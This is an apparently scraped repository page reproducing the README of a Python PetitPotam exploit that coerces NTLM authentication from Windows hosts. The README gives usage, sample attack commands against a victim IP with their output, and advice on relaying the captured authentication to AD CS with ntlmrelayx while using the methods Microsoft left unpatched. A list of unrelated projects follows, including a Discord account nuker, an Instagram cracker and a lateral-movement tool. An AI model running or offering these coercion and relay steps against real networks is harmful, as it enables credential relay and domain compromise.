Python implementation for PetitPotam

Related tags

Third-party APIs WrappersPetitPotam
Overview

PetitPotam

Coerce NTLM authentication from Windows hosts

Installtion

$ pip3 install impacket

Usage

usage: petitpotam.py [-h] [-debug] [-port [destination port]] [-pipe pipe]
                     [-method method] [-target-ip ip address]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                     target path

PetitPotam - Coerce authentication from Windows hosts

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  path                  UNC path for authentication

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -pipe pipe            Named pipe to use (default: lsarpc)
  -method method        Method used for coercing authentication
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use
                        whatever was specified as target. This is useful when
                        target is the NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters. If
                        valid credentials cannot be found, it will use the ones
                        specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will
                        use the domain part (FQDN) specified in the target
                        parameter

Examples

In these examples, the victim is 172.16.19.100 and the attacker is 172.16.19.1

The attack can use impacket-ntlmrelayx to relay the authentication to interesting endpoints, for instance Active Directory Certificate Services Web Enrollment.

By default, a random method will be chosen.

The target may or may not require authentication. These examples were tested on a Windows 2022 server, and no authentication was required.

The UNC path must point to the attacker's listener. Note that if the attacker is not part of the trusted intranet zone, the Windows host will try to authenticate with a null session. This can be circumvented by either using a NETBIOS name or ADIDNS record for the attacker.

Random Method

$ python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Choosing random method
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Specific Method

$ python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Details

PetitPotam was orignally created / discovered by topotam. This exploit is heavily based on the implementation and research from topotam.

If you're using ntlmrelayx and the Windows host connects with an anonymous logon (null) session, please see this pull request to fix the issue. You can confirm the authentication coercion with Responder.

CVE-2021-36942

Microsoft has released a patch for PetitPotam, but only for two of the methods (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv). For that reason, those methods are not implemented in this exploit.

Instead, the other methods (which were not fully implemented by topotam) have been implemented in this exploit.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
GitHub Repository
A discord account nuker with lots of tools that will destroy a discord account

A discord account nuker with lots of tools that will destroy a discord account (token destroyer... and much more).

firexi 10 Apr 28, 2022
WallAlley.bot is an open source and free to use financial discord bot originaly build for WallAlley server's community

WallAlley.bot About WallAlley.bot is an open source and free to use financial discord bot originaly build for WallAlley server's community. All data a

Mohammad KHADDAN 1 Jan 22, 2022
✨ 🐍 Python SDK for StarkNet.

✨ 🐍 starknet.py StarkNet SDK for Python 📘 Documentation Installation Quickstart Guide API Installation To install this package run pip install stark

Software Mansion 158 Jan 04, 2023
Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode)

hbctool A command-line interface for disassembling and assembling the Hermes Bytecode. Since the React Native team created their own JavaScript engine

Pongsakorn Sommalai 216 Jan 03, 2023
A simple Facebook Account generator, written in python (needs different Email so Accounts do not get banned)

FacebookAccountGenerator FAB is a Facebook-Account generating script, written in python Installation Use the package manager pip to install selenium p

MrOverload 7 Jan 05, 2023
Starlink Order Status Notification

Starlink Order Status Notification This script logs into Starlink order portal, pulls your estimated delivery date and emails it to a designated email

Aaron R. 1 Jul 08, 2022
The Github repository for the Amari API wrapper.

Amari.py Amari.py is an async, easy to use API wrapper for the AmariBot. Installation Enter any of these commands to install the library: pip install

TheF1ng3r 5 Dec 19, 2022
Discord Rich Presence for Team Fortress 2

TF2 Rich Presence Discord Rich Presence for Team Fortress 2 Detects current game state, queue info, playtime, and more Configurable, reliable, and per

Kataiser 33 Dec 31, 2022
CRUD database for python discord bot developers that stores data on discord text channels

Discord Database A CRUD (Create Read Update Delete) database for python Discord bot developers. All data is stored in key-value pairs directly on disc

Ankush Singh 7 Oct 22, 2022
A Python library for rendering ASS subtitle file format using libass.

ass_renderer A Python library for rendering ASS subtitle file format using libass. Installation pip install --user ass-renderer Contributing # Clone

1 Nov 02, 2022
修改自SharpNoPSExec的基于python的横移工具 A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena

PyNoPSExec A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena 根据@juliourena大神的SharpNOPsExec项目改写的横向移动工具 Platform(平台): Windows 1

<a href=[email protected]"> 23 Nov 09, 2022
A collection of discord tools I've made.

Discord A collection of discord tools i've made. What's in here? Basically every discord related project i've worked on can be found here, i'll try an

?? ?? ?? 6 Nov 13, 2021
An unofficial Python wrapper for the 'Binance exchange REST API'

Welcome to binex_f v0.1.0 many interfaces are heavily used by myself in product environment, the websocket is reliable (re)connected. Latest version:

DeepLn 2 Jan 05, 2022
Instadev - Crack Instagram IqbalDev

Crack Instagram IqbalDev ⇨ Install Script Di Termux $ pkg update && upgrade $

Dicky Wahyudi 1 Feb 27, 2022
💰 Import your ING Germany bank statements via FinTS into YNAB.

Import your ING Germany bank statements via FinTS into YNAB. Setup Before setting this up, please register your FinTS product – it's free and takes on

Arne Bahlo 23 Jan 21, 2022
Balsam Python client API & SDK

balsam No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) This Python package is automatically

Darren Govoni 1 Oct 22, 2021
Project developed as part of a selection process for the company Denox

📝 Tabela de conteúdos Sobre Requisitos para rodar o projeto Instalação Rotas da API Observações 🧐 Sobre Projeto desenvolvido como parte de um proces

Ícaro Sant'Ana 1 Mar 01, 2022
Wrapper for shh/rsync for use with OpenFOAM and blue bear

bbsync wrapper for shh/rsync for use with OpenFOAM and blue bear About The Project bbsync is a wrapper for shh/rsync for use with OpenFOAM and blue be

1 Dec 10, 2021
Code done for/during the course

Serverless Course Autumn 2021 - Code This repository contains a set of examples developed during, but not limited to the live coding sessions. Lesson

Alexandru Burlacu 4 Dec 21, 2021
A simple Discord Bot that uses the free CryptoCompare API to display cryptocurrency prices

What is this? This is a simple Discord Bot coded in Python that uses the free CryptoCompare API to display cryptocurrency prices Download Use git to c

Kevin 10 Apr 17, 2022